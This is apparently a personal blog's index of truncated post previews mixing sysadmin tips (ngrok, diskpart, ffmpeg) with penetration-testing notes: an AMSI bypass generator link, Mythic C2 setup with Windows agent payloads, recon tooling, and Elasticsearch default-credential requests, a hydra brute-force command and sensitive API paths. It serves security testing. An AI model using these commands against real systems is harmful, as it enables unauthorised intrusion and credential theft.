
Posts

Showing posts from 2024

Host an Application locally and access it over the internet via ngrok

ngrok creates a tunnel from your local machine to the ngrok server and hosts it on the internet via their HTTPS URL. Register an account on ngrok and log in.
#Download the client
curl -sSL https://ngrok-agent.s3.amazonaws.com/ngrok.asc \
  | sudo tee /etc/apt/trusted.gpg.d/ngrok.asc >/dev/null \
  && echo "deb https://ngrok-agent.s3.amazonaws.com buster main" \
  | sudo tee /etc/apt/sources.list.d/ngrok.list \
  && sudo apt update \
  && sudo apt install ngrok
#add the authToken
ngrok config add-authtoken 2p7Oc
#start a python server on your application
python -m http.server 3000
#start the tunnel - use the same port as the python server (3000 in the example below)
ngrok http http://localhost:3000 --request-header-add "ngrok-skip-browser-warning: true"
Setting up a Request Header
- Login to the application --> Universal Gateway --> Edges
- Create an Edge --> Request Headers --> `ngrok-skip-browser-warning :12
- go back to overv...

Extend Windows Partition Size - Fix `Extend Disk` greyed out

open cmd and run "diskpart"
# List the hard disks
list disk
# Select the hard disk
select disk 0
# List the partitions
list partition
# Select the partition that you want to delete and allocate to the new partition
# if you are allocating it on a VM, just create a new partition, assign a volume to it
# and then delete it
select partition 4
# Delete the partition
delete partition override
now go to `Disk Management` --> right click on the partition that you want to extend
# you should observe that Extend Disk is no longer grayed out
Select "Extend Disk" and now you can increase the partition size

AMSI Bypass Techniques

use https://amsi.fail/ to generate AMSI Bypass techniques

Installing Mythic C2 on Kali Linux

Download the repo
git clone https://github.com/its-a-feature/Mythic.git
cd Mythic
#Make the setup file
sudo make
Installing Docker
sudo apt update
sudo apt install -y docker.io
sudo systemctl enable docker --now
echo "deb [arch=amd64 signed-by=/etc/apt/keyrings/docker.gpg] https://download.docker.com/linux/debian bookworm stable" | \
  sudo tee /etc/apt/sources.list.d/docker.list
curl -fsSL https://download.docker.com/linux/debian/gpg | sudo gpg --dearmor -o /etc/apt/keyrings/docker.gpg
sudo apt update
sudo apt install -y docker-ce docker-ce-cli containerd.io
Log out of the Kali session and log in again
Running Mythic
#make sure you are in the Mythic main directory
cd Mythic
#Compile and generate the mythic-cli binary
sudo make
#Start Mythic - give it a few minutes to download and set up the containers - first time only
sudo ./mythic-cli start
#Setup Payloads - Apollo for Windows
sudo ./mythic-cli install github https://github.com/MythicAgents/Apollo.git
sudo ./mythic-cli install g...

Secure Source Code Review - PHP

Semgrep
#Installation
pip install semgrep==1.54.3
#Use the script below to run it; update the paths in the script
wget https://raw.githubusercontent.com/Bhanunamikaze/PenTest-Scripts/refs/heads/main/semgrep_runner.py
#Download the rules
git clone https://github.com/Bhanunamikaze/SemgrepRules-PHP.git
PHP CodeSniffer
Download the phpcs.phar file from the PHP_CodeSniffer Releases
sudo apt-get install php-tokenizer php-xml
php phpcs.phar /path/to/PHP_Code
Visual Code Grepper
https://github.com/nccgroup/VCG/tree/master
GitHub - tcosolutions/betterscan: Code Scanning/SAST/Static Analysis/Linting using many tools/Scanners with One Report (Code, IaC) - Betterscan
For NodeJS
GitHub - insidersec/insider: Static Application Security Testing (SAST) engine focused on covering the OWASP Top 10, to make source code analysis to find vulnerabilities right in the source code, focused on an agile and easy to implement software inside your DevOps pipeline. Support the following technologies: Jav...

Web Pentest - Recon

Refer to Simple WebPentest Checklist
Subdomain Enumeration
git clone https://github.com/TheRook/subbrute.git
python subbrute.py domain.com > subdomains.txt
git clone https://github.com/infosec-au/altdns.git
altdns -i subdomains.txt -o data_output -w words.txt -r -s results_output.txt
#paste the list into Bulk URL HTTP Status Code, Header & Redirect Checker | httpstatus.io
# this will give the status of live hosts; make sure to also check subdomains of the sub-domains
#Other Tools
amass enum -passive -norecursive -noalts -df domain.txt -o subs-1.txt
amass enum -passive -norecursive -noalts -df subs-1.txt -o all-sub.txt
Recon Automation
#Better use https://github.com/smicallef/spiderfoot - this automates most of the basic tasks
#use ReconFTW
git clone https://github.com/six2dez/reconftw
cd reconftw/
./install.sh
./reconftw.sh -d target.com -r
#or set up a container
docker pull six2dez/reconftw:main
docker run -it --rm \
  -v "${PWD}/OutputFolder/":'/reconftw/Recon...

ffmpeg

Create a Video from an Image
- Video will be the image
- Audio will be taken from the input video/audio file (-i 142.mp4)
- Output file will be generated with the image as the video and the audio from the input file
#USE CPU
ffmpeg -loop 1 -framerate 1 -i image.jpg -i 142.mp4 -map 0 -map 1:a -c:v libx264 -preset ultrafast -tune stillimage -vf fps=10,format=yuv420p -c:a copy -shortest 142_output.mp4
# USE GPU
ffmpeg -loop 1 -framerate 1 -i image.jpg -i 156.mp4 -map 0 -map 1:a -c:v h264_nvenc -preset fast -tune hq -vf fps=10,scale=1920:1080,format=yuv420p -c:a copy -shortest 156_output.mp4
Batch Script to take a list of .mp4 files as input and create a new video file with 'video as a still image' and audio from the given audio file

Pentesting Kibana, Elastic Search - Port 5601, 9200

#Service Name and Version info - if no info is displayed, auth is required
curl 10.10.10.10:9200/
#Default Creds
curl -X GET http://admin:elasticadmin@10.10.10.10:9200/
curl -X GET http://elastic:changeme@10.10.10.10:9200/
#Bruteforce Creds
hydra -L usernames.txt -P passwords.txt <target-ip> -s 9200 http-get /
ALL PATHS
_cat
/_cluster
/_security
/_cat/segments
/_cluster/allocation/explain
/_security/user
/_cat/shards
/_cluster/settings
/_security/privilege
/_cat/repositories
/_cluster/health
/_security/role_mapping
/_cat/recovery
/_cluster/state
/_security/role
/_cat/plugins
/_cluster/stats
/_security/api_key
/_cat/pending_tasks
/_cluster/pending_tasks
/_cat/nodes
/_nodes
/_cat/tasks
/_nodes/usage
/_cat/templates
/_nodes/hot_threads
/_cat/thread_pool
/_nodes/stats
/_cat/ml/trained_models
/_tasks
/_cat/transforms/_all
/_remote/info
/_cat/aliases
/_cat/allocation
/_cat/ml/anomaly_detectors
/_cat/count
/_cat/ml/data_frame/analytics
/_cat/ml/datafeeds
/_cat/fielddata
/_cat/healt...